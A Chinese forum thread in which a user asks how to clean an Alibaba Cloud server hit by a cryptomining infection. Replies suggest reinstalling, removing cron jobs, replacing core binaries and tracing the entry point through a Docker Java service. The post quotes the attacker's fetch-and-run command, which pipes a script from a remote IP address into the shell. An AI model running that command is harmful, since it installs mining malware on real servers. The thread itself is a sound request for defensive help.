这是一个创建于 1439 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天阿里云告警被植入挖矿病毒了,上去检查了一番看见运行了 curl 从他的服务器上拉了一个脚本,求大佬帮助,基于脚本内容该怎么修复服务器?
curl -fsSL http://192.210.200.66:1234/xmss  | 1 JDog 2022-01-21 15:51:37 +08:00 不废话,直接重装 |
 | 2 mikeguan 2022-01-21 15:56:17 +08:00 via Android 通过这个脚本又学习了 把定时任务干掉,把任意命令执行的脚本删掉应该就差不多了。 最关键的是找到从什么地方进来的,你给的脚本并不能反映你系统漏洞在哪 |
 | 3 youngkingdom OP @JDog 服务太多了,重装成本过高。这是最后没有办法的办法了 |
| 4 youngkingdom OP @mikeguan 查看告警详情是通过 docker 启动的 java 服务,服务已经停了,已经在检查代码漏洞了。目前是想要解决服务器上的问题 |
| 5 youngkingdom OP 已找到相关样本分析,https://www.52 坡姐.cn/thread-1540889-1-1.html |
 | 6 gadfly3173 2022-01-21 16:51:25 +08:00 可以考虑先用 sftp 之类的方式把 bash 之类的关键程序都换成干净的,然后检查下全服务器上所有最新修改的文件(如果它的脚本不会去伪造修改时间的话)然后再去看看从哪进来的。如果它会改时间的话还是重装吧 |
Select Language